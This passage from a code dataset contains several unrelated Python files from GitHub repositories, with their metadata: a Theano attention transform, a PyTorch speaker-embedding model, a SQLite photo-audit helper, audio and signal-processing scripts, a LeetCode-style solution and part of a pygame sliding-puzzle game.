dt_min) # (batch,)\n std = std_min + a[:, 1] * (std_max - std_min) # (batch,)\n std_t_bc = std.dimshuffle('x', 0) # (beam,batch)\n\n t = self.t # (batch,). that's the old t, which starts at zero.\n t_bc = t.dimshuffle('x', 0) # (beam,batch)\n\n t_round = T.round(t) # (batch,). +0.5 so that a later int-cast will be like round().\n start_idxs = t_round - n_beam / numpy.float32(2) # (batch,), beams, centered around t_int\n idxs_0 = T.arange(n_beam).dimshuffle(0, 'x') # (beam,batch). all on cpu, but static, no round trip\n idxs = T.cast(idxs_0, dtype=\"float32\") + start_idxs.dimshuffle('x', 0) # (beam,batch). centered around t_int\n\n # gauss window\n f_e = T.exp(-(T.cast(t_bc - idxs, dtype=\"float32\") ** 2) / (2 * std_t_bc ** 2)) # (beam,batch)\n norm = T.constant(1.0, dtype=\"float32\") / (std_t_bc * T.constant(sqrt(2 * pi), dtype=\"float32\")) # (beam,batch)\n w_t = f_e * norm # (beam,batch)\n w_t_bc = w_t.dimshuffle(0, 1, 'x') # (beam,batch,n_in)\n\n B_beam = multi_batch_beam(self.B, start_idxs, B_times, n_beam, \"wrap_around\")\n att = T.sum(B_beam * w_t_bc, axis=0, keepdims=False) # (batch,n_in)\n z_re = T.dot(att, self.W_att_in) # (batch,n_out*4)\n\n t_frac = T.cast((self.t + 1) / (self.c.dimshuffle('x') + 1), dtype=\"float32\") # (batch,)\n t_frac_row = t_frac.reshape((n_batch, 1)) # (batch,1)\n state_t_frac = T.constant(1, dtype=\"float32\").dimshuffle('x', 'x') - t_frac_row # (batch,1)\n state = T.concatenate([state_t_frac, a], axis=1) # (batch,3)\n z_re += T.dot(state, self.W_state_in)\n\n return z_re, {self.t: self.t + dt, self.c: self.c + 1}\n\n def cost(self):\n t_seq = self.get_state_vars_seq(self.t) # (time,batch)\n # Get the last frame. -2 because the last update is not used.\n B_index = self.B_index\n B_times = T.sum(B_index, axis=0)\n #B_times = T.printing.Print(\"B_times\")(B_times)\n B_last = B_times - 1 # last frame idx of the base seq\n O_index = self.layer.index\n O_times = T.sum(O_index, axis=0)\n #O_times = T.printing.Print(\"O_times\")(O_times)\n O_last = O_times - 2 # last frame. one less because initial states are in extra vector.\n # We need an extra check for small batches, would crash otherwise.\n O_last_clipped = T.clip(O_last, 0, t_seq.shape[0] - 1)\n batches = T.arange(t_seq.shape[1]) # (batch,)\n t_last = T.switch(T.lt(O_last, 0),\n self.state_vars_initial[\"t\"],\n t_seq[O_last_clipped[batches], batches]) # (batch,)\n #t_last = T.printing.Print(\"t_last\")(t_last)\n return T.sum((t_last - B_last) ** 2)\n\n\ndef get_dummy_recurrent_transform(recurrent_transform_name, n_out=5, n_batches=2, n_input_t=2, n_input_dim=2):\n \"\"\"\n :type recurrent_transform_name: str\n :rtype: RecurrentTransformBase\n This function is a useful helper for testing/debugging.\n \"\"\"\n cls = transform_classes[recurrent_transform_name]\n from NetworkRecurrentLayer import RecurrentUnitLayer\n from NetworkBaseLayer import SourceLayer\n if getattr(RecurrentUnitLayer, \"rng\", None) is None:\n RecurrentUnitLayer.initialize_rng()\n index = theano.shared(numpy.array([[1] * n_batches] * n_input_t, dtype=\"int8\"), name=\"i\")\n x_out = theano.shared(numpy.array([[[1.0] * n_input_dim] * n_batches] * n_input_t, dtype=\"float32\"), name=\"x\")\n layer = RecurrentUnitLayer(n_out=n_out, index=index, sources=[],\n base=[SourceLayer(n_out=x_out.get_value().shape[2], x_out=x_out, index=index)],\n attention=recurrent_transform_name)\n assert isinstance(layer.recurrent_transform, cls)\n return layer.recurrent_transform\n\n\ntransform_classes = {}; \":type: dict[str,class]\"\ntransforms_by_id = {}; \":type: dict[int,RecurrentTransformBase]\"\n\ndef _setup():\n import inspect\n for clazz in globals().values():\n if not inspect.isclass(clazz): continue\n if not issubclass(clazz, RecurrentTransformBase): continue\n if clazz.name is None: continue\n transform_classes[clazz.name] = clazz\n\n_setup()\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/rwth-i6_returnn/returnn-master/RecurrentTransform.py","file_name":"RecurrentTransform.py","file_ext":"py","file_size_in_byte":38186,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"14834075252","text":"import os,sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport h5py\nfrom tdnn import TDNN\nfrom adacos import AdaCos\n\ndef get_mask(tensor, lengths):\n mask = np.zeros((tensor.shape[0], tensor.shape[1], 1))\n\n for n in range(len(lengths)):\n l=lengths[n]\n if l > tensor.shape[1]:\n l=tensor.shape[1]\n mask[n:, :l, :] = 1.\n\n return torch.from_numpy(mask.astype(np.float32)).clone()\n\ndef stats_with_mask(tensor, mask):\n mean = torch.div(torch.sum(tensor*mask, dim=1, keepdim=True),torch.sum(mask, dim=1, keepdim=True))\n var = torch.square(tensor-mean)\n var = torch.sum(var*mask, dim=1, keepdim=True)\n var = torch.div(var, torch.sum(mask, dim=1, keepdim=True)+1.0e-8)\n std = torch.sqrt(var)\n if mean.shape[0] < 2:\n mean, std = mean.squeeze(), std.squeeze()\n mena,std = mean.unsqueeze(0), std.unsqueeze(0)\n else:\n mean, std = mean.squeeze(), std.squeeze()\n return mean, std\n\nclass X_vector(nn.Module):\n def __init__(self, input_dim = 40, class_num=2):\n super(X_vector, self).__init__()\n\n self.tdnn1 = TDNN(input_dim=input_dim, output_dim=512, context_size=5, dilation=1,dropout_p=0.5)\n self.tdnn2 = TDNN(input_dim=512, output_dim=512, context_size=3, dilation=2,dropout_p=0.5)\n self.tdnn3 = TDNN(input_dim=512, output_dim=512, context_size=3, dilation=3,dropout_p=0.5)\n self.tdnn4 = TDNN(input_dim=512, output_dim=512, context_size=4, dilation=4,dropout_p=0.5)\n self.segment5 = nn.Linear(512, 1500)\n self.segment6 = nn.Linear(3000, 512)\n self.segment7 = nn.Linear(512, 512)\n\n self.criterion = AdaCos(512, class_num)\n\n self.id2spk={}\n with open('speakers.txt', 'r') as f:\n lines = f.readlines()\n for line in lines:\n spk = line.strip().split()[0]\n id = int(line.strip().split()[1])\n self.id2spk[id] = spk\n \n def forward(self, inputs, speakers=None, lengths=None):\n tdnn1_out = self.tdnn1(inputs)\n tdnn2_out = self.tdnn2(tdnn1_out)\n tdnn3_out = self.tdnn3(tdnn2_out)\n tdnn4_out = self.tdnn4(tdnn3_out)\n out = self.segment5(tdnn4_out) # (b, t, f)\n if lengths is None:\n mean = torch.mean(out,1) # (b, f)\n std = torch.std(out,1) # (b, f)\n else:\n mask=get_mask(out, lengths).cuda()\n mean, std = stats_with_mask(out, mask)\n stat_pooling = torch.cat((mean,std),1) # (b, fx2)\n segment6_out = self.segment6(stat_pooling)\n x_vec = self.segment7(segment6_out)\n #return x_vec\n loss, logits = self.criterion(x_vec, speakers)\n \n return loss, logits\n \n def predict(self, x):\n with torch.no_grad():\n x -= self.mean\n x /= self.std\n x = torch.from_numpy(x).clone().float()\n x = x.unsqueeze(0)\n _, pred = self.forward(x.cuda())\n idx = torch.argmax(pred, dim=1).to('cpu').detach().numpy().copy().astype(int)[0]\n \n return self.id2spk[idx]\n \n def top_k(self, x, k=5):\n with torch.no_grad():\n x -= self.mean\n x /= self.std\n x = torch.from_numpy(x).clone().float()\n x = x.unsqueeze(0)\n _, pred = self.forward(x.cuda())\n _, idx = torch.topk(pred, k)\n idx = idx.to('cpu').detach().numpy().copy().astype(int).squeeze().tolist()\n return [ self.id2spk[k] for k in idx ]\n \n def set_stats(self, mean, std):\n self.mean = mean\n self.std = std\n \n def load_model(self, file):\n self.model.load_state_dict(torch.load(file, map_location=torch.device('cpu')), strict=False)\n\n def get_speaker(self, k):\n return self.id2spk[k]\n","repo_name":"akio-kobayashi/SimpleSpeaker","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39104288385","text":"import lrcat\nimport sqlite3\nimport sys\nimport os\nimport media_ext\n\nclass AuditDb:\n def __init__(self, fname=\"audit.sqlite3\", drop_flag=False):\n if os.path.exists(fname)==False:\n drop_flag=True # force all tables to be reconstructed\n #end\n \n self.con = sqlite3.connect(fname)\n cur = self.con.cursor()\n\n if drop_flag:\n self.create_table_lr_files()\n self.create_table_picasafiles()\n self.create_table_dirpaths()\n #end\n\n self.path_cache = {}\n\n def create_table_dirpaths(self):\n print(\"deleting table: dirpaths\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS dirpaths;\n \"\"\"\n\n cur.execute(cmd)\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS dirpaths(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n root_path TEXT NOT NULL,\n path_from_root TEXT NOT NULL UNIQUE);\n \"\"\"\n\n cur.execute(cmd)\n return\n\n def create_table_lr_files(self):\n print(\"deleting table: lr_files\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS lr_files;\"\"\"\n cur.execute(cmd)\n\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS lr_files(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n path_id INTEGER NOT NULL,\n extension TEXT,\n picasa_file_id INTEGER,\n filename TEXT NOT NULL);\n \"\"\"\n cur.execute(cmd)\n return\n\n def create_table_picasafiles(self):\n print(\"deleting table: picasa_files\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS picasa_files;\n \"\"\"\n cur.execute(cmd)\n\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS picasa_files(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n path_id INTEGER NOT NULL,\n extension TEXT,\n lr_file_id INTEGER,\n filename TEXT NOT NULL);\n \"\"\"\n cur.execute(cmd)\n return\n\n def normalize_path_from_root(self, path_from_root):\n \"\"\"\n normalize path_from_root wrt begin and end path separators\n\n returns normalized path\n \"\"\"\n if path_from_root[0:1]=='/':\n path_from_root=path_from_root[1:]\n #end\n\n if path_from_root[-1] != '/':\n path_from_root = path_from_root + '/'\n #end\n\n return path_from_root\n \n \n def register_path_from_root(self, path_from_root, root_dir):\n \"\"\"\n given path_from_root (a string), return the \n corresponding row ID (an integer) from the database.\n \n the row ID is either an existing table entry or a new table entry.\n\n returns row ID (integer)\n \"\"\"\n path_from_root = self.normalize_path_from_root(path_from_root)\n #\n # try reading rowid from cache\n try:\n rowid = self.path_cache[path_from_root]\n except KeyError:\n rowid = -1\n #end\n\n #\n # try to retrieve existing row ID\n if rowid < 0:\n cur = self.con.cursor()\n\n cmd = f\"\"\"\n SELECT * FROM dirpaths WHERE path_from_root=\"{path_from_root}\" \"\"\"\n cur.execute(cmd)\n results = cur.fetchall()\n assert len(results) <= 1\n\n if len(results)==1:\n rowid = results[0][0]\n #\n # add to cache\n self.path_cache[path_from_root] = rowid\n #end\n #end\n\n #\n # create new table entry\n if rowid < 0:\n cmd = f\"\"\"\n INSERT INTO dirpaths(root_path, path_from_root) VALUES (\"{root_dir}\", \"{path_from_root}\")\n \"\"\"\n cur.execute(cmd)\n rowid = cur.lastrowid\n self.con.commit()\n\n #\n # add to cache\n self.path_cache[path_from_root] = rowid\n # end\n\n assert rowid >= 0\n return rowid\n\n def commit(self):\n self.con.commit()\n return\n\n def extract_extension(self, fname):\n (_, ext) = os.path.splitext(fname)\n ext = ext.lower()\n return ext\n \n def insert_into_lr_files(self, path_id, fname):\n ext = self.extract_extension(fname)\n cur = self.con.cursor()\n cmd = f\"\"\"\n INSERT INTO lr_files(path_id, extension, filename) VALUES ({path_id}, \"{ext}\", \"{fname}\")\"\"\"\n cur.execute(cmd)\n\n return\n\n def insert_into_picasa_files(self, path_id, fname):\n ext = self.extract_extension(fname)\n \n cur = self.con.cursor()\n cmd = f\"\"\"\n INSERT INTO picasa_files(path_id, extension, filename) VALUES ({path_id}, \"{ext}\",\"{fname}\")\"\"\"\n cur.execute(cmd)\n\n return\n\n def update_picasa_files_lr_id(self, picasa_id, lr_id):\n cmd = f\"\"\"\n UPDATE picasa_files\n SET lr_file_id={lr_id}\n WHERE picasa_files.id={picasa_id}\"\"\"\n\n cur = self.con.cursor()\n cur.execute(cmd)\n\n return\n\n def update_lr_files_picasa_id(self, lr_id, picasa_id):\n cmd = f\"\"\"\n UPDATE lr_files\n SET picasa_file_id={picasa_id}\n WHERE lr_files.id={lr_id}\"\"\"\n\n cur = self.con.cursor()\n cur.execute(cmd)\n\n return\n \n\n def get_num_db_entries(self):\n \"\"\"\n return dictionary containing number of entries per auditdb table\n \"\"\"\n cur = self.con.cursor()\n\n cmd = \"\"\"SELECT * FROM lr_files\"\"\"\n cur.execute(cmd)\n results = cur.fetchall()\n num_lr = len(results)\n\n \n # OMIT .picasaoriginals and .converted directories!\n # OMIT non-media files, .e.g .db\n cmd = \"\"\"\n SELECT picasa_files.id FROM picasa_files\n INNER JOIN dirpaths\n WHERE picasa_files.path_id = dirpaths.id\n AND dirpaths.path_from_root NOT LIKE \"%picasaoriginals/\"\n AND dirpaths.path_from_root NOT LIKE \"%converted/\"\n AND \n \"\"\"\n ext = media_ext.IGNORABLE_EXT_TUPLE[0]\n cmd = cmd + f\"\"\"picasa_files.extension NOT LIKE \"{ext}\" \"\"\"\n for ext in media_ext.IGNORABLE_EXT_TUPLE[1:]:\n cmd = cmd + f\"\"\"AND picasa_files.extension NOT LIKE \"{ext}\" \"\"\"\n #end\n #print(cmd)\n \n cur.execute(cmd)\n results = cur.fetchall()\n num_picasa = len(results)\n \n cmd = \"\"\"\n SELECT * FROM dirpaths\n WHERE dirpaths.path_from_root NOT LIKE \"%picasaoriginals/\"\n AND dirpaths.path_from_root NOT LIKE \"%converted/\"\n \"\"\"\n cur.execute(cmd)\n results = cur.fetchall()\n num_paths = len(results)\n\n d = {'num_paths': num_paths, 'num_lr':num_lr, 'num_picasa':num_picasa}\n return d\n\n\n \n \n \n","repo_name":"robyu/lr-audit","sub_path":"auditdb.py","file_name":"auditdb.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42630716983","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n @Time : 2018/9/30 11:29 AM\n @Author : hanxiaocu\n @File : dataToImage.py\n \n \n\"\"\"\nimport base64\n\ndef dateToimage():\n data = \"\"\n imgdata=base64.b64decode(data)\n file=open('2.jpg','wb')\n file.write(imgdata)\n file.close()\n\n\n\ndef imageToData():\n f=open('723.png','rb') #二进制方式打开图文件\n ls_f=base64.b64encode(f.read()) #读取文件内容,转换为base64编码\n f.close()\n print(ls_f)\n\n\nif __name__ == '__main__':\n dateToimage()","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"hello/小工具/dataToImage.py","file_name":"dataToImage.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18855358935","text":"class Solution:\n\n def search(self, digits, k, s, res, mp):\n if k == len(digits):\n res.append(s)\n else:\n for d in mp[digits[k]]:\n self.search(digits, k+1, s+d, res, mp)\n\n\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if digits == '':\n return []\n mp = {'0':['0'],'1':['1'], '2':['a','b','c'],'3':['d','e','f'],'4':['g','h','i'],'5':['j','k','l'],\n '6':['m','n','o'],'7':['p','q','r','s'],'8':['t','u','v'],'9':['w','x','y','z']}\n res = []\n self.search(digits, 0, '', res, mp)\n return res\n","repo_name":"imju/codepath_in_week4","sub_path":"Recursion_LetterPhone.py","file_name":"Recursion_LetterPhone.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8190463973","text":"from __future__ import print_function\nimport os\nimport librosa\n\n\n# from visualization import tempoVSautoCorrelation, dTempoOnTempogram\n\n\ndef getBeat(audioName, isDynamic):\n audioFileName = audioName + \".mp3\"\n OutputPath = os.path.join(os.getcwd(), 'sampleOutput', audioFileName)\n\n y, sr = librosa.load(OutputPath)\n onset_env = librosa.onset.onset_strength(y, sr=sr)\n\n tempo = librosa.beat.tempo(onset_envelope=onset_env, sr=sr)\n # If static tempo\n\n dtempo = librosa.beat.tempo(onset_envelope=onset_env, sr=sr, aggregate=None)\n # If dynamic tempo\n\n ###############################################################################\n #\t*optional plotting\n #\ttempoVSautoCorrelation(tempo, 512)\n #\t\t-plotting estimated tempo VS Onset Auto Correlation\n #\t\t\t-param: static tempo, hop default\n #\n #\tdTempoOnTempogram(dtempo)\n #\t\t-plotting dynamic tempo estimates over a tempogram\n #\t\t\t-param: dynamic tempo\n ###############################################################################\n\n if isDynamic == 0:\n return tempo\n else:\n return dtempo\n","repo_name":"ttakasawa/Music_Play_Count_Estimator","sub_path":"Code/Python/FeatureExtraction/extractBeat.py","file_name":"extractBeat.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71961231412","text":"import numpy as np\nimport scipy.io.wavfile\nimport scipy.signal\nimport matplotlib.pyplot as plt\n\n\nFREQUENCY = 1000.0\nMAX_AMPLITUDE = 0.5\nSAMPLING_RATE = 44100\nDURATION = 1.0\n#calculated max number of sine waves according to nyquist's theorem\nM = int(np.floor(SAMPLING_RATE / 2 / FREQUENCY))\nLENGTH = 8192\n\n\ndef main():\n #generate constructed and perfect sawtooth waves\n constructed_sawtooth_wave = construct_sawtooth()\n perfect_sawtooth_wave = perfect_sawtooth()\n #write them to wav files\n scipy.io.wavfile.write(\"constructed_sawtooth.wav\", SAMPLING_RATE, constructed_sawtooth_wave)\n scipy.io.wavfile.write(\"perfect_sawtooth.wav\", SAMPLING_RATE, perfect_sawtooth_wave)\n #plot the time domain graph\n plot_time_domain(constructed_sawtooth_wave, perfect_sawtooth_wave)\n #generate and plot the db_mag fft graph\n constructed_spec = get_power_spec(constructed_sawtooth_wave)\n perfect_spec = get_power_spec(perfect_sawtooth_wave)\n plot_db_mag(constructed_spec, perfect_spec)\n\n\n#construct the sawtooth wave using the formula given in handout\ndef construct_sawtooth():\n time = np.arange(0, DURATION, 1 / SAMPLING_RATE)\n wave = np.zeros(len(time))\n\n for i in range(1, M + 1):\n temp_wave = (1.0 / i) * np.sin(i * 2.0 * np.pi * time * FREQUENCY)\n wave = wave + temp_wave\n\n wave = wave * (-2.0 * MAX_AMPLITUDE / np.pi)\n return wave\n\n\ndef perfect_sawtooth():\n time = np.arange(0, DURATION, 1 / SAMPLING_RATE)\n perfect_wave = MAX_AMPLITUDE * scipy.signal.sawtooth(FREQUENCY * 2.0 * np.pi * time)\n return perfect_wave\n\n\ndef plot_time_domain(constructed, perfect):\n plt.xlabel(\"Time\")\n plt.ylabel(\"Amplitude\")\n\n plt.plot(constructed, c=\"blue\", label=\"Reconstructed Sawtooth\")\n plt.plot(perfect, c=\"red\", label=\"Perfect Sawtooth\")\n\n plt.legend()\n plt.xlim(0, 250)\n plt.savefig('Time-Domain Waves.png')\n\n\ndef get_power_spec(wave):\n wave = wave[:LENGTH]\n window = np.blackman(len(wave))\n fft = np.fft.fft(wave * window)\n fft = fft[:len(fft) / 2 + 1]\n magfft = np.abs(fft) / (np.sum(window) / 2.0)\n epsilon = np.power(10.0, -10)\n power_spec = 20.0 * np.log10(magfft + epsilon)\n return power_spec\n\n\ndef plot_db_mag(constructed, perfect):\n plt.clf()\n plt.xlabel(\"FFT bin\")\n plt.ylabel(\"dB\")\n plt.plot(constructed, c=\"blue\", label=\"Reconstructed Sawtooth\")\n plt.plot(perfect, c=\"red\", label=\"Perfect Sawtooth\")\n\n plt.legend()\n plt.xlim(0, 4000)\n plt.title('Sawtooth wave reconstruction with 22 sine wave')\n plt.savefig('dB-magnitude FFT.png')\n\n\nmain()","repo_name":"LookRain/CS4347","sub_path":"Assignment5/assignment5_part1.py","file_name":"assignment5_part1.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12025510814","text":"import pandas as pd\nimport json\n\nmain_data = pd.read_csv(r\"C:/Users/Dell/sequentialPlotViewer/data/allergyBoundelss.csv\")\ndata_point = pd.read_csv(r\"C:/Users/Dell/sequentialPlotViewer/data/allergy_test.csv\")\n\nselected_graph = \"bargraph\"\n\nbar_data = main_data[main_data.plottype == selected_graph]\ncnt = 0\n\nfor index, data in bar_data.iterrows():\n cnt += 1\n constraints = json.loads(data.slice)\n fdata = data_point\n \n for i, j in constraints.items():\n fdata = fdata[fdata[i] == j]\n \n ","repo_name":"vraj152/sequential-plot-viewer","sub_path":"reading_data.py","file_name":"reading_data.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31874929524","text":"import pygame\nimport random\nimport os\nfrom settings import *\n\n\n# Tile class is dedicated to create tiles\nclass Tile(pygame.sprite.Sprite): # import sprites as pygame class in its parameter\n def __init__(self, game, x, y, text):\n pygame.font.init() # import fonts\n self.groups = game.sprites\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pygame.Surface((TILESIZE, TILESIZE)) # Create tile surface\n self.x, self.y = x, y\n self.text = text # Take a number converted into a str\n self.rect = self.image.get_rect()\n if self.text != \"empty\":\n self.font = pygame.font.SysFont(\"Georgia\", 50) # Choose a font and its size\n font_surface = self.font.render(self.text, True, BLACK) # Apply font on text\n self.image.fill(MAGENTA) # Color tile surface\n self.font_size = self.font.size(self.text)\n draw_x = (TILESIZE / 2) - self.font_size[0] / 2\n draw_y = (TILESIZE / 2) - self.font_size[1] / 2\n self.image.blit(font_surface, (draw_x, draw_y))\n else:\n self.image.fill(BLACK) # Empty tile has a different color\n\n def update(self):\n self.rect.x = self.x * TILESIZE\n self.rect.y = self.y * TILESIZE\n\n def click(self, mouse_x, mouse_y): # Function which read mouse position on a tile\n return self.rect.left <= mouse_x <= self.rect.right and self.rect.top <= mouse_y <= self.rect.bottom\n\n # Direction will be used to check if an empty tile can be moved with mouse or arrows\n def left(self):\n return self.rect.x - TILESIZE >= 0\n\n def up(self):\n return self.rect.y - TILESIZE >= 0\n\n def right(self):\n return self.rect.x + TILESIZE < GAMESIZE * TILESIZE\n\n def down(self):\n return self.rect.y + TILESIZE < GAMESIZE * TILESIZE\n\n # Function which binds arrows keys to the game\n def move_tiles(self, key):\n for row, tiles in enumerate(self.tiles):\n for col, tile in enumerate(tiles):\n # Check if empty tile can be moved to a direction, then invert empty tile with a tile\n if key == pygame.K_LEFT:\n if tile.right() and self.tiles_grid[row][col + 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][col + 1], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_RIGHT:\n if tile.left() and self.tiles_grid[row][col - 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][\n col - 1], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_UP:\n if tile.down() and self.tiles_grid[row + 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][\n col], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_DOWN:\n if tile.up() and self.tiles_grid[row - 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][\n col], \\\n self.tiles_grid[row][col]\n return True\n return False\n\n\nclass GraphicText: # Will display text next to the puzzle\n def __init__(self, x, y, text):\n self.x = x\n self.y = y\n self.text = text\n\n def draw(self, screen):\n font = pygame.font.SysFont(\"Georgia\", 30)\n text = font.render(self.text, True, WHITE)\n screen.blit(text, (self.x, self.y))\n\n\nclass Button: # Class making buttons\n def __init__(self, x, y, width, height, text, color, text_color): # Parameters\n self.color, self.text_color = color, text_color\n self.width, self.height = width, height\n self.x, self.y = x, y\n self.text = text\n\n def draw(self, screen): # Uses pygame rect, font and blit functions to draw buttons\n pygame.draw.rect(screen, self.color, (self.x, self.y, self.width, self.height))\n font = pygame.font.SysFont(\"Georgia\", 30)\n text = font.render(self.text, True, self.text_color)\n self.font_size = font.size(self.text)\n draw_x = self.x + (self.width / 2) - self.font_size[0] / 2\n draw_y = self.y + (self.height / 2) - self.font_size[1] / 2\n screen.blit(text, (draw_x, draw_y))\n\n def click(self, mouse_x, mouse_y): # Function which read mouse position on a tile\n return self.x <= mouse_x <= self.x + self.width and self.y <= mouse_y <= self.y + self.height\n\n\nclass PuzzleGame(Tile, GraphicText, Button):\n def __init__(self):\n pygame.init()\n # Basic parameters\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(title)\n self.clock = pygame.time.Clock()\n self.button_list = []\n self.num = 0\n # Parameters for randomize option\n self.prechoice = \"\"\n self.randomizer_timer = 0\n self.start_randomize = False\n\n # Parameters for win condition and to change board size\n self.start_game = False\n self.finished = False\n self.changeboard_size = False\n self.size = [\"3*3\", \"4*4\", \"5*5\"]\n\n # Use for arrow binding and to count time empty tile was displaced\n self.moved = False\n self.movement_count = 0\n\n def init_game(self): # Function used to create tiles_grid, it appends a number in grid\n grid, num = [], 1\n for x in range(GAMESIZE):\n grid.append([])\n for y in range(GAMESIZE):\n grid[x].append(num)\n num += 1\n grid[-1][-1] = 0\n return grid\n\n def randomizer(self): # Create possible direction to go for the empty tile\n # Detect if empty tile can be moved and add directions to list\n moves = []\n for row, tiles in enumerate(self.tiles): # Append moves\n for col, tile in enumerate(tiles):\n if tile.text == \"empty\":\n if tile.left():\n moves.append(\"left\")\n if tile.right():\n moves.append(\"right\")\n if tile.up():\n moves.append(\"up\")\n if tile.down():\n moves.append(\"down\")\n break\n if len(moves) > 0:\n break # Quit the loops when moves are appended to moves list\n\n # Remove a choice that has been used\n if self.prechoice == \"right\":\n moves.remove(\"left\") if \"left\" in moves else moves\n elif self.prechoice == \"left\":\n moves.remove(\"right\") if \"right\" in moves else moves\n elif self.prechoice == \"up\":\n moves.remove(\"down\") if \"down\" in moves else moves\n elif self.prechoice == \"down\":\n moves.remove(\"up\") if \"up\" in moves else moves\n\n # Choose a direction in moves list, invert tiles then remove it from the list\n choice = random.choice(moves)\n self.prechoice = choice\n if choice == \"right\":\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][col + 1], \\\n self.tiles_grid[row][col]\n elif choice == \"left\":\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][col - 1], \\\n self.tiles_grid[row][col]\n elif choice == \"up\":\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][col], \\\n self.tiles_grid[row][col]\n elif choice == \"down\":\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][col], \\\n self.tiles_grid[row][col]\n\n def draw_tiles(self):\n # Uses tiles.grid, made by init-game(), in a nested loop to create tiles by invoking the Tile Class.\n self.tiles = []\n for row, x in enumerate(self.tiles_grid):\n self.tiles.append([])\n for col, tile in enumerate(x):\n if tile != 0:\n self.tiles[row].append(Tile(self, col, row, str(tile)))\n else:\n self.tiles[row].append(Tile(self, col, row, \"empty\"))\n\n def new(self):\n self.sprites = pygame.sprite.Group()\n self.tiles_grid = self.init_game()\n self.ordered_tiles = self.init_game()\n\n self.start_game = False\n self.button_list.append(Button(655, 170, 190, 50, \"Randomize\", BEIGE, BLACK))\n self.button_list.append(Button(640, 240, 60, 50, \"3*3\", BEIGE, BLACK))\n self.button_list.append(Button(720, 240, 60, 50, \"4*4\", BEIGE, BLACK))\n self.button_list.append(Button(800, 240, 60, 50, \"5*5\", BEIGE, BLACK))\n self.draw_tiles()\n\n def run(self):\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n self.draw()\n\n def draw_grid(self): # Draw a grid by using draw.line()\n for row in range(-1, GAMESIZE * TILESIZE, TILESIZE):\n pygame.draw.line(self.screen, LIGHTGREY, (row, 0), (row, GAMESIZE * TILESIZE))\n for col in range(-1, GAMESIZE * TILESIZE, TILESIZE):\n pygame.draw.line(self.screen, LIGHTGREY, (0, col), (GAMESIZE * TILESIZE, col))\n\n def layout(self):\n self.screen.fill(BGCOLOR)\n self.sprites.update()\n self.sprites.draw(self.screen)\n self.draw_grid()\n for button in self.button_list:\n self.str_movement_count = str(self.movement_count)\n button.draw(self.screen)\n GraphicText(695, 80, self.str_movement_count + \" moves\").draw(self.screen)\n numint = int(self.num)\n numint2 = int(self.str_movement_count)\n best = min(numint, numint2) # Find the smallest int, which will be displayed if file is not empty.\n if not os.path.getsize(\"userscore.txt\"):\n GraphicText(610, 380, (\"Best Score : \" + self.str_movement_count)).draw(self.screen)\n else:\n GraphicText(630, 380, (\"Best Score : \" + str(best))).draw(self.screen)\n if self.finished is True:\n GraphicText(630, 430, \"You won with \" + self.str_movement_count + \" moves\").draw(self.screen)\n\n def draw(self):\n self.layout()\n # Change board size by using new()\n if self.changeboard_size is True:\n self.new()\n self.changeboard_size = False\n self.str_movement_count = \"\"\n\n # Check if the puzzle is resolved, then write result in a file if it's better than previous one\n if self.start_game:\n if self.tiles_grid == self.ordered_tiles:\n self.finished = True\n self.start_game = False\n with open('userscore.txt', 'r+') as self.file:\n try:\n self.best_score = self.file.readline()\n self.num, self.text = self.best_score.split()\n except:\n if not os.path.getsize(\"userscore.txt\") or int(self.str_movement_count) < int(self.num):\n self.file.seek(0, 0)\n self.file.write(str(self.str_movement_count) + \" moves\")\n if self.start_randomize: # When randomize is 